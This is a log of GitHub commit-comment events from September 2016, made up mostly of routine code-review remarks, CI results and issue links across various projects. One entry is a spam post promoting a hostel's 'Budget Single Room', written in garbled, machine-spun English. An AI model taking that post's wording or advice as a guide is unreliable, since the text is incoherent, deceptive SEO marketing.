{"id":"4507766406","type":"CommitCommentEvent","actor":{"login":"anotherjames"},"repo":{"name":"anotherjames/dotfiles"},"payload":{"comment":{"id":18878146,"position":null,"line":null,"path":null,"commit_id":"5dbbf5b80a879a8922fc6ead4dd7738770e3c0ee","created_at":"2016-09-02T10:28:18Z","updated_at":"2016-09-02T10:28:18Z","body":"This is all based on code taken/adapted from http://stackoverflow.com/a/36723363 and https://getcomposer.org/doc/articles/troubleshooting.md#xdebug-impact-on-composer"}},"created_at":"2016-09-02T10:28:18Z"}
{"id":"4507767088","type":"CommitCommentEvent","actor":{"login":"Y-Less"},"repo":{"name":"Misiur/YSI"},"payload":{"comment":{"id":18878151,"position":null,"line":null,"path":null,"commit_id":"189e09963ea8d2e9f723a19cf695fcf87093d9f5","created_at":"2016-09-02T10:28:28Z","updated_at":"2016-09-02T10:28:28Z","body":"Not massively, but sometimes push a few bits and pieces.  Follow this repository, it's where most of what little I do happens:\r\n\r\nhttps://github.com/Misiur/YSI-Includes"}},"created_at":"2016-09-02T10:28:28Z"}
{"id":"4507767952","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Mobeye/react-native"},"payload":{"comment":{"id":18878154,"position":null,"line":null,"path":null,"commit_id":"55e092f2639153e8e5faebdfb445ed99b30a12ad","created_at":"2016-09-02T10:28:41Z","updated_at":"2016-09-02T10:28:41Z","body":"Ça a l'air géré dans 0.31.0 @machard https://github.com/facebook/react-native/blob/da063e3d55a4fcd617ac496d62aa051343f35b56/ReactAndroid/src/main/java/com/facebook/react/views/textinput/ReactTextInputManager.java#L170-L209"}},"created_at":"2016-09-02T10:28:41Z"}
{"id":"4507768354","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SusAghlamazyan/ACA"},"payload":{"comment":{"id":18878156,"position":20,"line":20,"path":"Homework9Modified/src/Controller.java","commit_id":"01760431d39d9d495ebd1e1034f33b7d5bc4ab92","created_at":"2016-09-02T10:28:47Z","updated_at":"2016-09-02T10:28:47Z","body":"static User newU; -> static User loggedInUser;"}},"created_at":"2016-09-02T10:28:47Z"}
{"id":"4507769546","type":"CommitCommentEvent","actor":{"login":"nikitas1711"},"repo":{"name":"nikitas1711/Nikitas1711"},"payload":{"comment":{"id":18878159,"position":null,"line":null,"path":null,"commit_id":"6659157981a1ca4f11f802b1b512865298ef6340","created_at":"2016-09-02T10:29:04Z","updated_at":"2016-09-02T10:29:04Z","body":"Hi\r\n"}},"created_at":"2016-09-02T10:29:04Z"}
{"id":"4507773394","type":"CommitCommentEvent","actor":{"login":"karatebuilderboy"},"repo":{"name":"karatebuilderboy/Launcher"},"payload":{"comment":{"id":18878167,"position":null,"line":null,"path":null,"commit_id":"8ecec369499d2a6336e35c438b23a03e181f734b","created_at":"2016-09-02T10:29:59Z","updated_at":"2016-09-02T10:29:59Z","body":"> @karatebuilderboy Sorry, this is the only way to contact you since I'm banned from scratch. Here you go: https://github.com/Arinerron/ScratchAPI\r\n\r\nThanks! Is there an example repo someone has made with it?"}},"created_at":"2016-09-02T10:29:59Z"}
{"id":"4507775673","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"ruslanadotsenko/java_kurs"},"payload":{"comment":{"id":18878171,"position":11,"line":17,"path":"sandbox/src/main/java/ru/stqa/pft/sandbox/Point.java","commit_id":"2f1ab65d47c73dc136c9070f3145e2b93ac1899a","created_at":"2016-09-02T10:30:33Z","updated_at":"2016-09-02T10:30:33Z","body":"    public static double distance(Point p2)\r\n    {\r\n        double distance = Math.sqrt(Math.pow(this.x-p2.x,2) + Math.pow(this.y-p2.y,2));\r\n        System.out.println(\" Расстояние между точками p1 и p2 \" + \" = \" + distance);\r\n\r\n        return distance;\r\n    }"}},"created_at":"2016-09-02T10:30:33Z"}
{"id":"4507775803","type":"CommitCommentEvent","actor":{"login":"patriksvensson"},"repo":{"name":"cake-build/cake"},"payload":{"comment":{"id":18878172,"position":14,"line":null,"path":"src/Cake.Common/Tools/MSBuild/MSBuildSettings.cs","commit_id":"3484db41cf037585821b4b6a3a99c2ab29e6c57d","created_at":"2016-09-02T10:30:35Z","updated_at":"2016-09-02T10:30:35Z","body":"Can we make this an `ICollection<MSBuildLogger>` instead?"}},"created_at":"2016-09-02T10:30:35Z"}
{"id":"4507777355","type":"CommitCommentEvent","actor":{"login":"pvalsecc"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18878177,"position":65,"line":65,"path":"src/gui/editorwidgets/qgskeyvaluewidget.cpp","commit_id":"db46e89696d668ae8c349ab3b45ceb37876b8af3","created_at":"2016-09-02T10:30:59Z","updated_at":"2016-09-02T10:30:59Z","body":"I thought we were using c++14 on master?\r\nWhy are you talking a foreach? I'm not using foreach because it give me only access to the values or only the keys if I do extra work. "}},"created_at":"2016-09-02T10:30:59Z"}
{"id":"4507777376","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Mobeye/react-native"},"payload":{"comment":{"id":18878178,"position":null,"line":null,"path":null,"commit_id":"28fef434401575ee5df9b6ed98fc99b3aab4c60d","created_at":"2016-09-02T10:31:00Z","updated_at":"2016-09-02T10:31:00Z","body":"Dans 0.31.0 il semble que la notion de ThreadGroup est géré avec un `null` https://github.com/facebook/react-native/blob/v0.31.0/ReactAndroid/src/main/java/com/facebook/react/bridge/queue/MessageQueueThreadImpl.java#L181-L206\r\n\r\nEst-ce que tu te rappelles où le stack overflow survenait ? @machard "}},"created_at":"2016-09-02T10:31:00Z"}
{"id":"4507777982","type":"CommitCommentEvent","actor":{"login":"jcarsique"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18878179,"position":4,"line":126,"path":"nuxeo-services/nuxeo-platform-web-common/src/main/java/org/nuxeo/ecm/platform/ui/web/auth/NuxeoAuthenticationFilter.java","commit_id":"38d7b2a0b240a1552cdafadbe5054070425d64b1","created_at":"2016-09-02T10:31:09Z","updated_at":"2016-09-02T10:31:09Z","body":"    /**\r\n     * @deprecated Since 8.4. Use {@link LoginScreenHelper#getStartupPagePath()} instead.\r\n     * @see LoginScreenHelper\r\n     */\r\n    @Deprecated\r\n    public static final String DEFAULT_START_PAGE = LoginScreenHelper.getStartupPagePath();"}},"created_at":"2016-09-02T10:31:09Z"}
{"id":"4507779697","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SusAghlamazyan/ACA"},"payload":{"comment":{"id":18878186,"position":29,"line":29,"path":"Homework9Modified/src/Controller.java","commit_id":"01760431d39d9d495ebd1e1034f33b7d5bc4ab92","created_at":"2016-09-02T10:31:34Z","updated_at":"2016-09-02T10:31:34Z","body":"startValidation -> execute()\r\nThis method name shouldn't contain validation world. Because this method purpose is execute your commands.\r\nYou can create other method with \"void validate(String command) throws InvalidCommandException\" and call that method from your executor method."}},"created_at":"2016-09-02T10:31:34Z"}
{"id":"4507783066","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SusAghlamazyan/ACA"},"payload":{"comment":{"id":18878195,"position":76,"line":76,"path":"Homework9Modified/src/Controller.java","commit_id":"01760431d39d9d495ebd1e1034f33b7d5bc4ab92","created_at":"2016-09-02T10:32:25Z","updated_at":"2016-09-02T10:32:25Z","body":"userList.add(newUser); //you don't need keep all users in memory "}},"created_at":"2016-09-02T10:32:25Z"}
{"id":"4507786164","type":"CommitCommentEvent","actor":{"login":"rikvdkleij"},"repo":{"name":"rikvdkleij/intellij-haskell"},"payload":{"comment":{"id":18878215,"position":null,"line":null,"path":null,"commit_id":"b9c77924a07d22162e931590d0cf9d464a8373f7","created_at":"2016-09-02T10:33:14Z","updated_at":"2016-09-02T10:33:14Z","body":"You can take a look in GlobalStackProcess or ProjectStackProces.\n\nOn 2 September 2016 at 03:01, (λ _ λ) <notifications@github.com> wrote:\n\n> @rikvdkleij <https://github.com/rikvdkleij> so any links about this new\n> protocol? i mean how to communicate with stack repl.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/rikvdkleij/intellij-haskell/commit/b9c77924a07d22162e931590d0cf9d464a8373f7#commitcomment-18873133>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAfFg_Y7BlnXrvRioyMGLw6tq1N3WDTkks5ql3V3gaJpZM4JyuGU>\n> .\n>\n"}},"created_at":"2016-09-02T10:33:14Z"}
{"id":"4507788156","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SusAghlamazyan/ACA"},"payload":{"comment":{"id":18878227,"position":112,"line":112,"path":"Homework9Modified/src/Controller.java","commit_id":"01760431d39d9d495ebd1e1034f33b7d5bc4ab92","created_at":"2016-09-02T10:33:45Z","updated_at":"2016-09-02T10:33:45Z","body":"` public void addNumber(User user) ->  public void addNumber()`\r\nyour method doesn't need user because of you have static user variable and can get it ."}},"created_at":"2016-09-02T10:33:45Z"}
{"id":"4507788815","type":"CommitCommentEvent","actor":{"login":"pieman64"},"repo":{"name":"pieman64/SmartBlynkie-ioT-Game"},"payload":{"comment":{"id":18878230,"position":5,"line":5,"path":"README.md","commit_id":"4521077defdee43b52052eba68ba7b135d39fd9d","created_at":"2016-09-02T10:33:54Z","updated_at":"2016-09-02T10:33:54Z","body":"[![SmartBlynkie™© ioT Game](https://cloud.githubusercontent.com/assets/8315296/18200908/e7ffe0ba-710f-11e6-99fa-9b031fa80c96.png)](https://youtu.be/RBnHyGzlykE?t=23s \"SmartBlynkie™© ioT Game\")"}},"created_at":"2016-09-02T10:33:54Z"}
{"id":"4507790128","type":"CommitCommentEvent","actor":{"login":"pieman64"},"repo":{"name":"pieman64/SmartBlynkie-ioT-Game"},"payload":{"comment":{"id":18878235,"position":5,"line":5,"path":"README.md","commit_id":"4521077defdee43b52052eba68ba7b135d39fd9d","created_at":"2016-09-02T10:34:14Z","updated_at":"2016-09-02T10:34:14Z","body":"[![SmartBlynkie™© ioT Game](https://cloud.githubusercontent.com/assets/8315296/18200908/e7ffe0ba-710f-11e6-99fa-9b031fa80c96.png)](https://youtu.be/RBnHyGzlykE?t=23s \"SmartBlynkie™© ioT Game\")"}},"created_at":"2016-09-02T10:34:14Z"}
{"id":"4507791017","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SusAghlamazyan/ACA"},"payload":{"comment":{"id":18878237,"position":116,"line":116,"path":"Homework9Modified/src/Controller.java","commit_id":"01760431d39d9d495ebd1e1034f33b7d5bc4ab92","created_at":"2016-09-02T10:34:27Z","updated_at":"2016-09-02T10:34:27Z","body":"Here you need repo call for save number to data base (file)"}},"created_at":"2016-09-02T10:34:27Z"}
{"id":"4507792815","type":"CommitCommentEvent","actor":{"login":"sonots"},"repo":{"name":"sonots/embulk-filter-column"},"payload":{"comment":{"id":18878240,"position":14,"line":17,"path":"src/main/java/org/embulk/filter/column/path/PropertyPathToken.java","commit_id":"5506c26818e811b94fc122d974c141ce8eb90bca","created_at":"2016-09-02T10:34:55Z","updated_at":"2016-09-02T10:34:55Z","body":"You can automatically comoute from stringDelimiter"}},"created_at":"2016-09-02T10:34:55Z"}
{"id":"4507793504","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SusAghlamazyan/ACA"},"payload":{"comment":{"id":18878242,"position":119,"line":119,"path":"Homework9Modified/src/Controller.java","commit_id":"01760431d39d9d495ebd1e1034f33b7d5bc4ab92","created_at":"2016-09-02T10:35:05Z","updated_at":"2016-09-02T10:35:05Z","body":"your method doesn't need user because of you have static user variable and can get it ."}},"created_at":"2016-09-02T10:35:05Z"}
{"id":"4507794331","type":"CommitCommentEvent","actor":{"login":"sonots"},"repo":{"name":"sonots/embulk-filter-column"},"payload":{"comment":{"id":18878244,"position":14,"line":17,"path":"src/main/java/org/embulk/filter/column/path/PropertyPathToken.java","commit_id":"5506c26818e811b94fc122d974c141ce8eb90bca","created_at":"2016-09-02T10:35:17Z","updated_at":"2016-09-02T10:35:17Z","body":"s/comoute/compute/"}},"created_at":"2016-09-02T10:35:17Z"}
{"id":"4507795425","type":"CommitCommentEvent","actor":{"login":"kidd"},"repo":{"name":"AutoGeneral/IridiumApplicationTesting"},"payload":{"comment":{"id":18878246,"position":8,"line":122,"path":"build.gradle","commit_id":"bea9c61c3e2b7c0eda150aea96177f17f4bac340","created_at":"2016-09-02T10:35:34Z","updated_at":"2016-09-02T10:35:34Z","body":"ahh... great. I was 'patiently' looking at github 'releases' . thanks!"}},"created_at":"2016-09-02T10:35:34Z"}
{"id":"4507796597","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SusAghlamazyan/ACA"},"payload":{"comment":{"id":18878249,"position":4,"line":4,"path":"Homework9Modified/src/MyException.java","commit_id":"01760431d39d9d495ebd1e1034f33b7d5bc4ab92","created_at":"2016-09-02T10:35:53Z","updated_at":"2016-09-02T10:35:53Z","body":"MyException -> InvalidCommandException or other meaningful name"}},"created_at":"2016-09-02T10:35:53Z"}
{"id":"4507797669","type":"CommitCommentEvent","actor":{"login":"andreasohlund"},"repo":{"name":"Particular/NServiceBus"},"payload":{"comment":{"id":18878252,"position":22,"line":102,"path":"src/NServiceBus.Core/DelayedDelivery/TimeoutManager/ExpiredTimeoutsPoller.cs","commit_id":"4d73e137ad9a147eb54d0cefa80479b81e1f1225","created_at":"2016-09-02T10:36:09Z","updated_at":"2016-09-02T10:36:09Z","body":"Not following how this early exit could cause more duplicates?"}},"created_at":"2016-09-02T10:36:09Z"}
{"id":"4507798865","type":"CommitCommentEvent","actor":{"login":"antpovzner"},"repo":{"name":"ewedel/pebble-sunclock"},"payload":{"comment":{"id":18878256,"position":null,"line":null,"path":null,"commit_id":"ec1a34366fbfec64d31e08b7658dad9ce0ea89d7","created_at":"2016-09-02T10:36:26Z","updated_at":"2016-09-02T10:36:26Z","body":"Right. Thank you so much!"}},"created_at":"2016-09-02T10:36:26Z"}
{"id":"4507798866","type":"CommitCommentEvent","actor":{"login":"pvalsecc"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18878255,"position":61,"line":61,"path":"src/gui/editorwidgets/qgskeyvaluewidget.h","commit_id":"db46e89696d668ae8c349ab3b45ceb37876b8af3","created_at":"2016-09-02T10:36:26Z","updated_at":"2016-09-02T10:36:26Z","body":"@nyalldawson,\r\nYou are very in advance on this one anyway. This commit will be part of a separate PR. It slipped in my other PR by mistake and I've fixed that one minute later. I'll create the PR for this commit when my previous one is merged.\r\nBut don't worry, your comments are not lost. I'm fixing them."}},"created_at":"2016-09-02T10:36:26Z"}
{"id":"4507799359","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SusAghlamazyan/ACA"},"payload":{"comment":{"id":18878258,"position":11,"line":11,"path":"Homework9Modified/src/UserRepository.java","commit_id":"01760431d39d9d495ebd1e1034f33b7d5bc4ab92","created_at":"2016-09-02T10:36:34Z","updated_at":"2016-09-02T10:36:34Z","body":"Your repo should implement interface"}},"created_at":"2016-09-02T10:36:34Z"}
{"id":"4507799708","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18878259,"position":null,"line":null,"path":null,"commit_id":"10f6f2964b6649551b35e4ed0f01b90c12d71f30","created_at":"2016-09-02T10:36:39Z","updated_at":"2016-09-02T10:36:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 902](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12355&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:00"}},"created_at":"2016-09-02T10:36:39Z"}
{"id":"4507804398","type":"CommitCommentEvent","actor":{"login":"ataillefer"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18878266,"position":4,"line":126,"path":"nuxeo-services/nuxeo-platform-web-common/src/main/java/org/nuxeo/ecm/platform/ui/web/auth/NuxeoAuthenticationFilter.java","commit_id":"38d7b2a0b240a1552cdafadbe5054070425d64b1","created_at":"2016-09-02T10:37:48Z","updated_at":"2016-09-02T10:37:48Z","body":"I guess you mean adding back `public static final String DEFAULT_START_PAGE = \"nxstartup.faces\";` as deprecated.\r\nBut what's the point of leaving a constant that is not used anymore and that we don't want people to use?\r\nAnd I believe that this is not API breaking."}},"created_at":"2016-09-02T10:37:48Z"}
{"id":"4507807234","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18878275,"position":null,"line":null,"path":null,"commit_id":"6e5c07abdd9aa423393e706ff9d8298f4fe42cb8","created_at":"2016-09-02T10:38:30Z","updated_at":"2016-09-02T10:38:30Z","body":"Hi mstembera, can you elaborate on the sign of the coefficient in front of ei.pi->pawn_imbalance() that you use (+6). I sort of fail to see why it would help the attacking side if the pawn imbalance is large, for instance in the case where all the pawns have been liquidated on the queenside the imbalance will be large but the position will be more drawish, no ?"}},"created_at":"2016-09-02T10:38:30Z"}
{"id":"4507807676","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18878276,"position":9,"line":9,"path":"PhoneType.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-02T10:38:37Z","updated_at":"2016-09-02T10:38:37Z","body":"phoneId -> phoneTypeId"}},"created_at":"2016-09-02T10:38:37Z"}
{"id":"4507807959","type":"CommitCommentEvent","actor":{"login":"xingruoyu"},"repo":{"name":"xingruoyu/datasciencecoursera"},"payload":{"comment":{"id":18878277,"position":null,"line":null,"path":null,"commit_id":"73b1e6c307ae675ef335c6f481a788a9967cc959","created_at":"2016-09-02T10:38:40Z","updated_at":"2016-09-02T10:38:40Z","body":"Assignment for Coursera"}},"created_at":"2016-09-02T10:38:40Z"}
{"id":"4507808088","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18878278,"position":65,"line":65,"path":"src/gui/editorwidgets/qgskeyvaluewidget.cpp","commit_id":"db46e89696d668ae8c349ab3b45ceb37876b8af3","created_at":"2016-09-02T10:38:42Z","updated_at":"2016-09-02T10:38:42Z","body":"Ah - sorry, didn't see that. \r\n\r\nI'd love to move to c++11 mandatory but apparently the windows support isn't there yet."}},"created_at":"2016-09-02T10:38:42Z"}
{"id":"4507812174","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18878292,"position":61,"line":61,"path":"src/gui/editorwidgets/qgskeyvaluewidget.h","commit_id":"db46e89696d668ae8c349ab3b45ceb37876b8af3","created_at":"2016-09-02T10:39:40Z","updated_at":"2016-09-02T10:39:40Z","body":"Was wondering what happened to them! I was trying to find them to put a general \"looks good!\" to the map changes."}},"created_at":"2016-09-02T10:39:40Z"}
{"id":"4507812426","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":18878296,"position":null,"line":null,"path":null,"commit_id":"e2ee60dd644f52efecc3774d2b411856076a1364","created_at":"2016-09-02T10:39:45Z","updated_at":"2016-09-02T10:39:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;IbPY3Z6x&#x2F;24-configuration-search\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Configuration Search</a>"}},"created_at":"2016-09-02T10:39:45Z"}
{"id":"4507813165","type":"CommitCommentEvent","actor":{"login":"fdlk"},"repo":{"name":"molgenis/molgenis"},"payload":{"comment":{"id":18878299,"position":9,"line":546,"path":"molgenis-dataexplorer/src/main/resources/js/dataexplorer.js","commit_id":"2a262e8290f390a1d4c07ce477bc20a8aae46fb5","created_at":"2016-09-02T10:39:55Z","updated_at":"2016-09-02T10:39:55Z","body":"add ()"}},"created_at":"2016-09-02T10:39:55Z"}
{"id":"4507814066","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18878304,"position":null,"line":null,"path":null,"commit_id":"f24a574427ccfc8051c8043109653783ab545983","created_at":"2016-09-02T10:40:11Z","updated_at":"2016-09-02T10:40:11Z","body":"not sure what was that TODO about, but we actually still have to do it properly and send/check document version :)"}},"created_at":"2016-09-02T10:40:11Z"}
{"id":"4507815676","type":"CommitCommentEvent","actor":{"login":"damithc"},"repo":{"name":"se-edu/addressbook-level2"},"payload":{"comment":{"id":18878306,"position":11,"line":34,"path":"test/java/seedu/addressbook/parser/ParserTest.java","commit_id":"8b2ed362962a92e3bd9d71a69529ad24b9b5ff12","created_at":"2016-09-02T10:40:33Z","updated_at":"2016-09-02T10:40:33Z","body":"Tweaked test names to fit the format `featureTested_scenario_expectedBehavior`"}},"created_at":"2016-09-02T10:40:33Z"}
{"id":"4507817054","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18878309,"position":61,"line":61,"path":"src/gui/editorwidgets/qgskeyvaluewidget.h","commit_id":"db46e89696d668ae8c349ab3b45ceb37876b8af3","created_at":"2016-09-02T10:40:54Z","updated_at":"2016-09-02T10:40:54Z","body":"Quick question - is list/map literals in qgsexpression on your roadmap?"}},"created_at":"2016-09-02T10:40:54Z"}
{"id":"4507817839","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":18878311,"position":null,"line":null,"path":null,"commit_id":"a1e620fa655b4f7e66b14b25bf6311cf34b307a2","created_at":"2016-09-02T10:41:07Z","updated_at":"2016-09-02T10:41:07Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;m1UtqaFf&#x2F;25-config-save-does-not-return-to-last-tab\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Config save - does not return to last tab.</a>"}},"created_at":"2016-09-02T10:41:07Z"}
{"id":"4507817891","type":"CommitCommentEvent","actor":{"login":"damithc"},"repo":{"name":"se-edu/addressbook-level2"},"payload":{"comment":{"id":18878312,"position":25,"line":42,"path":"test/java/seedu/addressbook/parser/ParserTest.java","commit_id":"8b2ed362962a92e3bd9d71a69529ad24b9b5ff12","created_at":"2016-09-02T10:41:08Z","updated_at":"2016-09-02T10:41:08Z","body":"Javadoc format should not be used for non javadoc comments."}},"created_at":"2016-09-02T10:41:08Z"}
{"id":"4507820935","type":"CommitCommentEvent","actor":{"login":"rdvincent"},"repo":{"name":"BIC-MNI/libminc"},"payload":{"comment":{"id":18878323,"position":null,"line":null,"path":null,"commit_id":"2f6b922f6dc61404df30911da5d13bdb9bccc2cc","created_at":"2016-09-02T10:41:54Z","updated_at":"2016-09-02T10:41:54Z","body":"Fixes BIC-MNI/minc-tools#51"}},"created_at":"2016-09-02T10:41:54Z"}
{"id":"4507821587","type":"CommitCommentEvent","actor":{"login":"damithc"},"repo":{"name":"se-edu/addressbook-level2"},"payload":{"comment":{"id":18878325,"position":null,"line":null,"path":null,"commit_id":"8b2ed362962a92e3bd9d71a69529ad24b9b5ff12","created_at":"2016-09-02T10:42:05Z","updated_at":"2016-09-02T10:42:05Z","body":"@YijinL did some cosmetic changes to test cases. "}},"created_at":"2016-09-02T10:42:05Z"}
{"id":"4507824648","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":18878331,"position":null,"line":null,"path":null,"commit_id":"975736e4e7e7be21e76d82c4993fcb4808a50a0a","created_at":"2016-09-02T10:42:48Z","updated_at":"2016-09-02T10:42:48Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;EaR5Uk7M&#x2F;26-disqus-integration-error-if-article-title-has-quotes\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Disqus Integration Error if article title has quotes</a>"}},"created_at":"2016-09-02T10:42:48Z"}
{"id":"4507827405","type":"CommitCommentEvent","actor":{"login":"sonalisoni044"},"repo":{"name":"PARMOTION/Have-A-Comfortable-Stay-When-Travelling-Your-Dream-Destinations-Alone"},"payload":{"comment":{"id":18878335,"position":null,"line":null,"path":null,"commit_id":"607f40f43113133e84b2b64957b6a5c2a0b4a7a6","created_at":"2016-09-02T10:43:29Z","updated_at":"2016-09-02T10:43:29Z","body":"**Have A Comfortable Stay When Travelling Your Dream Destinations Alone**\r\n\r\nSingles vacations are about acting naturally. Solo voyages, as of late, have picked up prominence. Whether it is a young person, a moderately aged individual, a divorced person or a widower or even an old individual or a professional,everyone needs to invest significant solo time. For each one of such individuals who have not been sufficiently fortunate to have awesome companions, solo journeysare the best approach to meet new individuals. \r\n\r\n![39949007](https://cloud.githubusercontent.com/assets/21897152/18201395/8151ea1c-7127-11e6-81cf-61583f6c9db0.jpg)\r\n\r\nSince single explorers don't need to consider the preferences and aversions of some other individual, the kind of voyage they need to attempt is totally in their own hands. There is a bunchof choices accessible, contingent upon what one expects out of the occasion. For example, for individuals who wish to unwind and revive, booking all inclusive packages at an ayurvedic and naturopathy outlet would be a smart thought. For moderately aged ladies, booking a spa would do wonders. \r\n\r\nA few travel organizations compose outings to national parks, enterprise sports destinations which incorporate para-cruising, rafting, snorkelling and so forth. You can take the help of web for points of interest or contact a dependable travel operator to know more about the alternatives accessible. They will help you book your [**Budget Single Room**](http://www.poppyhostelcuracao.com/rooms/private-single-room ) too for a comfortable stay. For nature-sweethearts, there are eco-tourism packages. Moderately aged people can contact the travel organizations for outdoors trips, golf-resorts, angling trips or even hiking trips. Ski resorts are for the all the more brave ones. Singles journey occasions are most appropriate for the more lively people who just wish to have full adventure.\r\n\r\n![39949002](https://cloud.githubusercontent.com/assets/21897152/18201412/97af1d2a-7127-11e6-9a22-4a6ee03464fb.jpg)\r\n\r\n\r\nWhatever is the way of one's vacation; there are bundles for all financial plans. Scan the web completely before making any bookings. Taking guidance and proposals from individuals who have effectively flown out to the craved destination helps a considerable measure. There are a few individual web journals accessible on the web which gives direct data to the single voyager. For ladies, security is a need and it is critical to book an outing with a dependable travel organization. While booking a package with an agency, everything about convenience, transportation,suppers and touring is dealt with and thus spares the explorer a great deal of botheration. \r\n\r\nAll gatherings are escorted by a prepared and qualified aide who is knowledgeable in the local dialect and is much acquainted with the neighbourhood destinations. Ensure you book a travel package much ahead of time for there is constrained. While booking a room at an inn, Request A **# `Budget Single Room`** or go for a dormitory one if that inn has one available. A portion of the lodgings offer rooms with no single supplement, thus one can appreciate occasions without supplement. \r\n\r\nWhile voyaging solo, one needs to make arrangements much ahead of time. Security and accommodation are needs for the performance explorer. Be that as it may, when going in a gathering, one can pick to be a part of a same-age social group or a blended gathering.\r\n\r\nWebsite: www.poppyhostelcuracao.com\r\n"}},"created_at":"2016-09-02T10:43:29Z"}
{"id":"4507827940","type":"CommitCommentEvent","actor":{"login":"zimbatm"},"repo":{"name":"NixOS/nixos-weekly"},"payload":{"comment":{"id":18878338,"position":null,"line":null,"path":null,"commit_id":"6227b9314f9266912edde40159cec8d5f9be1b9c","created_at":"2016-09-02T10:43:37Z","updated_at":"2016-09-02T10:43:37Z","body":"Unless I'm mistaken this implementation is going to move posts from page to page, so now URLs aren't permanent links to the same content."}},"created_at":"2016-09-02T10:43:37Z"}
{"id":"4507828743","type":"CommitCommentEvent","actor":{"login":"henrinie"},"repo":{"name":"hujosh/signbank-feedback"},"payload":{"comment":{"id":18878339,"position":null,"line":null,"path":null,"commit_id":"7959a1f4da000222e3077647e8b30157708f60c3","created_at":"2016-09-02T10:43:48Z","updated_at":"2016-09-02T10:43:48Z","body":"Hi Josh,\r\nGreat work so far! I am sharing some ideas that come into mind.\r\nhttps://github.com/hujosh/signbank-feedback/commit/7959a1f4da000222e3077647e8b30157708f60c3#diff-37021361f4a7fe2764d8ff4537f22facR86\r\nI wonder if you could use something else on that line than `feedback = GeneralFeedback.objects.all()`\r\n\r\nIf I understand this correctly, you are checking if there are any records in the database. Instead of that you could probably use something like this (if it is desired at all).\r\n`feedback = GeneralFeedback.objects.get(date=datetime.date.today(), comment=self.data['comment'])`\r\nThat would get one object with that data. With objects.filter you could get multiple objects.\r\n\r\n"}},"created_at":"2016-09-02T10:43:48Z"}
{"id":"4507828867","type":"CommitCommentEvent","actor":{"login":"sonots"},"repo":{"name":"sonots/embulk-filter-column"},"payload":{"comment":{"id":18878340,"position":14,"line":17,"path":"src/main/java/org/embulk/filter/column/path/PropertyPathToken.java","commit_id":"5506c26818e811b94fc122d974c141ce8eb90bca","created_at":"2016-09-02T10:43:50Z","updated_at":"2016-09-02T10:43:50Z","body":"Ah, wait.\r\nwhat happens if stringDelimiter is other than double quatation or single quotation?\r\nDoes Utils.escape support such pattern? (seems no).\r\nWhy does this constructor support such many variations? I think double or single quation are sufficient.\r\n(Did the original implementation support such variations? I do not get how it works...)\r\n"}},"created_at":"2016-09-02T10:43:50Z"}
